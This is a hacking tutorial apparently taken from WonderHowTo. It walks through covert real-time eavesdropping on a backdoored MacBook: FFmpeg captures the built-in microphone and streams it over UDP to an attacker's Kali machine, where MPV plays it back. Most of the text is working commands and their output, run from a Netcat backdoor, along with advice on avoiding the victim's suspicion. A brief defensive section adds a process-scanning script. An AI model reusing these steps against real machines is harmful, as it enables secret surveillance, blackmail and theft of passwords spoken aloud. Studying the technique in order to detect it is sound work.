
Remote listening in real time with every MacBook microphone «Zero Byte :: WonderHowTo



Google, Amazon and Facebook are always listening. But what is worse? Hackers are listening too. Windows PCs are particularly vulnerable, but with a few simple commands, a remote attacker can even take over the microphone on a Mac computer, stream audio, and listen to private conversations in real time without the victim's knowledge, abusing an overlooked security consideration.

After an attacker sets up a backdoor on a vulnerable MacBook or compromises the device remotely with a fake PDF, they can perform a variety of attacks using modern post-exploitation frameworks such as Empire or Metasploit. This time, I'm showing a stealthy way to capture audio from the victim's microphone using an application called FFmpeg.


How This Listening Attack Works

FFmpeg is a multimedia framework that can decode, encode, transcode, convert, stream and play most formats on Windows, macOS and Unix-based distributions.

The tool is installed on both the backdoored MacBook and the attacker's Kali system. A listening server is hosted on the attacker's side, and the victim's MacBook sends audio to the attacker's system. The attacker can then tap the FFmpeg-generated stream and hear everything around the compromised MacBook.

Overheard information can include private conversations where a victim gives a password or secret to someone in the room, personal information shared during phone calls, or conversations that can later be used for blackmail. This information is very valuable to an attacker who wants to further exploit the personal and digital lives of the victim, employee, family and work colleagues.

Step 1: Installing FFmpeg in Kali

FFmpeg can be installed on the attacker's Kali Linux system with the command apt-get install ffmpeg (see below).

  apt-get install ffmpeg

Reading package lists... Done
Building dependency tree
Reading state information... Done
Recommended packages:
  ffmpeg-doc
The following packages will be upgraded:
  ffmpeg
1 upgraded, 0 newly installed, 0 to remove and 596 not upgraded.
Need to get 1,622 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 http://archive-3.kali.org/kali kali-rolling/main amd64 ffmpeg amd64 7:3.4.2-2+b1 [1,622 kB]
Fetched 1,622 kB in 3s (540.9 kB/s)
Reading changelogs... Done
(Reading database ... 312014 files and directories currently installed.)
Preparing to unpack .../ffmpeg_7%3a3.4.2-2+b1_amd64.deb ...
Unpacking ffmpeg (7:3.4.2-2+b1) over (7:3.4.2-1+b1) ...
Setting up ffmpeg (7:3.4.2-2+b1) ...
Processing triggers for man-db (2.8.2-1) ...

Step 2: Configuring the FFmpeg server

To receive an incoming audio stream, FFmpeg must be configured on the attacker's system. The following command can be used to start FFmpeg.

  ffmpeg -i udp://0.0.0.0:9999 /tmp/outputFile.mp3

This command tells FFmpeg to open UDP (udp://) port 9999 and accept input (-i) on every available interface (0.0.0.0). The audio stream is then saved in MP3 format as outputFile.mp3 in the /tmp directory. Of course, the port number (9999), the storage directory (/tmp) and the output file name can be changed as needed. For this demonstration I use easy-to-remember values.

That's it for setting up FFmpeg on the attacker's system. Next, I'll show how to configure FFmpeg on the backdoored MacBook.

Step 3: Install FFmpeg on the Backdoored MacBook

FFmpeg can record audio via Apple's AVFoundation, a full-featured framework for working with media on iOS, macOS and watchOS. With AVFoundation, users can play, create and edit media files and integrate powerful media features into applications.

Use cURL to download FFmpeg from the Netcat backdoor on the MacBook, and save the ZIP in the /tmp directory. This can be done with the following command. To keep the victim user from becoming suspicious, a directory other than /tmp may be used on the target MacBook.

  curl 'https://ffmpeg.zeranoe.com/builds/macos64/static/ffmpeg-4.0-macos64-static.zip' -o /tmp/ffmpeg.zip

When the download is complete, use the command unzip /tmp/ffmpeg.zip to extract the files as shown below.

  unzip /tmp/ffmpeg.zip

Archive:  ffmpeg.zip
   creating: ffmpeg-4.0-macos64-static/
   creating: ffmpeg-4.0-macos64-static/bin/
  inflating: ffmpeg-4.0-macos64-static/bin/ffmpeg
  inflating: ffmpeg-4.0-macos64-static/bin/ffplay
  inflating: ffmpeg-4.0-macos64-static/bin/ffprobe
   creating: ffmpeg-4.0-macos64-static/doc/
  inflating: ffmpeg-4.0-macos64-static/doc/bootstrap.min.css
  inflating: ffmpeg-4.0-macos64-static/doc/default.css
  inflating: ffmpeg-4.0-macos64-static/doc/developer.html
  inflating: ffmpeg-4.0-macos64-static/doc/faq.html
  inflating: ffmpeg-4.0-macos64-static/doc/fate.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-all.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-bitstream-filters.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-codecs.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-devices.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-filters.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-formats.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-protocols.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-resampler.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-scaler.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-utils.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffplay-all.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffplay.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffprobe-all.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffprobe.html
  inflating: ffmpeg-4.0-macos64-static/doc/general.html
  inflating: ffmpeg-4.0-macos64-static/doc/git-howto.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavcodec.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavdevice.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavfilter.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavformat.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavutil.html
  inflating: ffmpeg-4.0-macos64-static/doc/libswresample.html
  inflating: ffmpeg-4.0-macos64-static/doc/libswscale.html
  inflating: ffmpeg-4.0-macos64-static/doc/mailing-list-faq.html
  inflating: ffmpeg-4.0-macos64-static/doc/nut.html
  inflating: ffmpeg-4.0-macos64-static/doc/platform.html
  inflating: ffmpeg-4.0-macos64-static/doc/style.min.css
  inflating: ffmpeg-4.0-macos64-static/LICENSE.txt
   creating: ffmpeg-4.0-macos64-static/Preferences/
  inflating: ffmpeg-4.0-macos64-static/Preferences/ffprobe.xsd
  inflating: ffmpeg-4.0-macos64-static/Preferences/libvpx-1080p.ffpreset
  inflating: ffmpeg-4.0-macos64-static/Preferences/libvpx-1080p50_60.ffpreset
  inflating: ffmpeg-4.0-macos64-static/Preferences/libvpx-360p.ffpreset
  inflating: ffmpeg-4.0-macos64-static/Preferences/libvpx-720p.ffpreset
  inflating: ffmpeg-4.0-macos64-static/Preferences/libvpx-720p50_60.ffpreset
  inflating: ffmpeg-4.0-macos64-static/README.txt

A new directory named "ffmpeg-4.0-macos64-static/" is created. It contains a bin/ directory that holds the ffmpeg file. Change to bin/ with the cd command.

  cd ffmpeg-4.0-macos64-static/bin/

Make sure that the ffmpeg file has permission to execute by using the chmod command below.

  chmod 777 ffmpeg

Then list the available input devices on the MacBook with the command ./ffmpeg -f avfoundation -list_devices true -i "", as seen below.

  ./ffmpeg -f avfoundation -list_devices true -i ""

[AVFoundation input device @ 0x7fda1bc152c0] AVFoundation video devices:
[AVFoundation input device @ 0x7fda1bc152c0] [0] FaceTime HD Camera (Built-in)
[AVFoundation input device @ 0x7fda1bc152c0] [1] Capture screen 0
[AVFoundation input device @ 0x7fda1bc152c0] AVFoundation audio devices:
[AVFoundation input device @ 0x7fda1bc152c0] [0] USB Audio CODEC
[AVFoundation input device @ 0x7fda1bc152c0] [1] Built-in Microphone

This command forces (-f) FFmpeg to use the AVFoundation format and lists (-list_devices) all available input (-i "") devices on the MacBook. AVFoundation uses the "video:audio" convention, so recording audio with the built-in microphone appears in the next command as ":1", because the microphone is assigned to audio device "1".

To record audio using the built-in microphone, run the following command from a Netcat shell on the backdoored MacBook:

  ./ffmpeg -f avfoundation -i ":1" -f mp3 udp://ATTACKER-IP-ADDRESS:9999

Remember, the input source on other MacBook devices may be displayed as "0" or "2." The force format (-f) argument is used again, this time to specify the output format (mp3), and the audio stream is sent to the attacker's UDP address on port 9999.

In the Netcat backdoor, output like the following is printed continuously while the stream is running.

  ffmpeg version 4.0 Copyright (c) 2000-2018 the FFmpeg developers
built with Apple LLVM version 9.1.0 (clang-902.0.39.1)
configuration: --enable-gpl --enable-version3 --enable-sdl2 --enable-bzlib --enable-fontconfig --enable-gnutls --enable-iconv --enable-libass --enable-libbluray --enable-libfreetype --enable-libmp3lame --enable-libopencore-amrnb --enable-libopencore-amrwb --enable-libopenjpeg --enable-libopus --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libtheora --enable-libtwolame --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx264 --enable-libx265 --enable-libxml2 --enable-libzimg --enable-lzma --enable-zlib --enable-gmp --enable-libvidstab --enable-libvorbis --enable-libvo-amrwbenc --enable-libmysofa --enable-libspeex --enable-libxvid --enable-libaom --enable-appkit --enable-avfoundation --enable-coreimage --enable-audiotoolbox
libavutil      56. 14.100 / 56. 14.100
libavcodec     58. 18.100 / 58. 18.100
libavformat    58. 12.100 / 58. 12.100
libavdevice    58.  3.100 / 58.  3.100
libavfilter     7. 16.100 /  7. 16.100
libswscale      5.  1.100 /  5.  1.100
libswresample   3.  1.100 /  3.  1.100
libpostproc    55.  1.100 / 55.  1.100
Input #0, avfoundation, from ':1':
  Duration: N/A, start: 68239.447483, bitrate: 2822 kb/s
    Stream #0:0: Audio: pcm_f32le, 44100 Hz, stereo, flt, 2822 kb/s
Stream mapping:
  Stream #0:0 -> #0:0 (pcm_f32le (native) -> mp3 (libmp3lame))
Press [q] to stop, [?] for help
Output #0, mp3, to 'udp://ATTACKER-IP-ADDRESS:9999':
  Metadata:
    TSSE            : Lavf58.12.100
    Stream #0:0: Audio: mp3 (libmp3lame), 44100 Hz, stereo, fltp
    Metadata:
      encoder         : Lavc58.18.100 libmp3lame
size=    2354kB time=00:02:30.62 bitrate= 128.0kbits/s speed=0.999x

Back on the attacker's server, the FFmpeg terminal displays information about the incoming audio data and begins saving the audio in the specified (/tmp) directory.

  ffmpeg version 3.4.2-2+b1 Copyright (c) 2000-2018 the FFmpeg developers
built with gcc 7 (Debian 7.3.0-16)
libavutil      55. 78.100 / 55. 78.100
libavcodec     57.107.100 / 57.107.100
libavformat    57. 83.100 / 57. 83.100
libavdevice    57. 10.100 / 57. 10.100
libavfilter     6.107.100 /  6.107.100
libavresample   3.  7.  0 /  3.  7.  0
libswscale      4.  8.100 /  4.  8.100
libswresample   2.  9.100 /  2.  9.100
libpostproc    54.  7.100 / 54.  7.100
Input #0, mp3, from 'udp://0.0.0.0:9999':
  Metadata:
    encoder         : Lavf58.12.100
  Duration: N/A, start: 0.000000, bitrate: 128 kb/s
    Stream #0:0: Audio: mp3, 44100 Hz, stereo, s16p, 128 kb/s
Stream mapping:
  Stream #0:0 -> #0:0 (mp3 (native) -> mp3 (libmp3lame))
Press [q] to stop, [?] for help
Output #0, mp3, to '/tmp/outputFile.mp3':
  Metadata:
    TSSE            : Lavf57.83.100
    Stream #0:0: Audio: mp3 (libmp3lame), 44100 Hz, stereo, s16p
    Metadata:
      encoder         : Lavc57.107.100 libmp3lame
[mp3 @ 0x55ddc6449240] overread, skip -8 enddists: -4 -4
[mp3 @ 0x55ddc6449240] overread, skip -9 enddists: -7 -7
[mp3 @ 0x55ddc6449240] overread, skip -7 enddists: -6 -6
[mp3 @ 0x55ddc6449240] overread, skip -8 enddists: -5 -5
[mp3 @ 0x55ddc6449240] overread, skip -7 enddists: -1 -1
[mp3 @ 0x55ddc6449240] overread, skip -5 enddists: -2 -2

...

[mp3 @ 0x55ddc6449240] overread, skip -7 enddists: -3 -3peed=0.997x
[mp3 @ 0x55ddc6449240] overread, skip -7 enddists: -6 -6
[mp3 @ 0x55ddc6449240] overread, skip -7 enddists: -2 -2peed=0.996x
[mp3 @ 0x55ddc6449240] overread, skip -6 enddists: -5 -5=0.997x
[mp3 @ 0x55ddc6449240] overread, skip -6 enddists: -5 -5=0.994x
[mp3 @ 0x55ddc6449240] overread, skip -7 enddists: -2 -2
[mp3 @ 0x55ddc6449240] overread, skip -7 enddists: -3 -3
size=    2466kB time=00:02:37.78 bitrate= 128.0kbits/s speed=0.994x
video:0kB audio:2466kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: 0.010020%

As long as the FFmpeg terminals are running on both machines, the MacBook microphone continues to send audio to the attacker's server.

Step 4: Install MPV and Listen to Streaming Audio

The last step is to listen to the audio stream. This can be done with MPV, a terminal-based application that can play audio from the command line. Use the command apt-get install mpv to install MPV in Kali.

  apt-get install mpv

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  mpv
0 upgraded, 1 newly installed, 0 to remove and 596 not upgraded.
Need to get 0 B/933 kB of archives.
After this operation, 2,293 kB of additional disk space will be used.
Selecting previously unselected package mpv.
(Reading database ... 311978 files and directories currently installed.)
Preparing to unpack .../mpv_0.27.2-1_amd64.deb ...
Unpacking mpv (0.27.2-1) ...
Setting up mpv (0.27.2-1) ...

Finally, use the command mpv --keep-open=yes /tmp/outputFile.mp3 to start listening to the audio:

  mpv --keep-open=yes /tmp/outputFile.mp3
Playing: outputFile.mp3
 (+) Audio --aid=1 (mp3)
AO: [pulse] 44100Hz stereo 2ch s16
A: 00:01:54 / 00:02:37 (72%)

The --keep-open argument is not required. With it, MPV does not close when the end of the file is reached.

As mentioned above, FFmpeg continues to write audio to the file "outputFile.mp3". Since MPV plays the audio in real time, it occasionally reaches the end of the file before FFmpeg has finished processing the incoming stream. This is much like YouTube videos that need to buffer before they can be played. MPV cannot play audio that FFmpeg has not yet processed. I would recommend leaving a 5-10 second buffer in the MPV terminal for a seamless (near-real-time) streaming experience.

How to Protect Against Audio Streaming Attacks

There is a good chance that anti-virus software will not fend off such attacks, as FFmpeg is not considered a malicious application and does not attempt to modify files on the computer or open ports.

Other than frequently looking for suspicious processes with tools such as ps, there is not much that can be done. In a future guide, I'll show how to hide such processes from an active user's detection, so these methods are not a surefire way to detect abuse.
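To make the ps check above concrete, here is an added example (not code from the original article) that scans a process list for any command line opening an AVFoundation audio input, and marks those that also write to a network URL. It matches on arguments rather than on the executable name; the sample process list, the /private/tmp/helper name and the 192.0.2.10 address are constructed for illustration.

```python
NET_SCHEMES = ("udp://", "tcp://", "rtp://", "rtmp://", "srt://", "http://", "https://")

# Constructed sample of `ps -axo pid=,user=,command=` output (not from the article).
# ps drops shell quoting, so ":1" appears without quotes. 192.0.2.10 is a placeholder.
SAMPLE_PS = """\
  312 alice /Applications/Safari.app/Contents/MacOS/Safari
  877 alice /tmp/ffmpeg-4.0-macos64-static/bin/ffmpeg -f avfoundation -i :1 -f mp3 udp://192.0.2.10:9999
  901 alice /usr/local/bin/ffmpeg -i talk.mov -c:a aac talk.m4a
  950 alice /private/tmp/helper -f avfoundation -i :0 -f mp3 udp://192.0.2.10:9999
  977 alice /usr/local/bin/ffmpeg -f avfoundation -i 1:0 /Users/alice/screencast.mkv
  988 alice /usr/local/bin/ffmpeg -f avfoundation -i 1 /Users/alice/screen.mkv
"""


def audio_capture_findings(ps_text):
    """Return one dict per process whose arguments open an AVFoundation audio input."""
    findings = []
    for line in ps_text.splitlines():
        fields = line.split()
        if len(fields) < 3 or not fields[0].isdigit():
            continue  # blank line or header
        pid, user, argv = int(fields[0]), fields[1], fields[2:]
        # Match on arguments, not on the executable name, so a renamed binary still hits.
        for i, arg in enumerate(argv[:-1]):
            if arg == "-f" and argv[i + 1] == "avfoundation":
                rest = argv[i + 2:]
                break
        else:
            continue
        if "-i" not in rest:
            continue
        after_input = rest[rest.index("-i") + 1:]
        if not after_input:
            continue  # e.g. the device-listing call, whose empty -i "" is lost in ps
        # AVFoundation device spec is "video:audio"; the part after ":" is the microphone.
        _, sep, audio = after_input[0].partition(":")
        if not sep or audio in ("", "none"):
            continue  # video-only capture
        dest = next((a for a in after_input[1:] if a.startswith(NET_SCHEMES)), None)
        findings.append({"pid": pid, "user": user, "exe": argv[0],
                         "audio_device": audio, "network_dest": dest})
    return findings


if __name__ == "__main__":
    for f in audio_capture_findings(SAMPLE_PS):
        kind = "STREAMING" if f["network_dest"] else "local capture"
        print(f'{kind}: pid={f["pid"]} exe={f["exe"]} mic={f["audio_device"]} dest={f["network_dest"]}')
```

On a real Mac, feed the function the text returned by ps -axo pid=,user=,command= and review every finding whose network_dest is set; a local capture such as a screencast is reported too, but with no destination.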

One last way to protect yourself from eavesdropping is to disconnect the built-in microphone cable of the MacBook, iMac, or other Mac computer and use only third-party microphones or headsets with integrated microphones, which you can simply unplug. This will at least protect you from potential eavesdropping.

Stay tuned for more macOS hacks

That's it for streaming audio from a backdoored MacBook with FFmpeg and MPV. In the next few articles, I'll show how to drop keychain passwords, capture keystrokes, hack iCloud passwords, and use many Empire and Metasploit post-exploitation modules to hack macOS devices.

Cover Picture of Negative Space / PEXELS; Screenshots of tokyoneon / zero byte
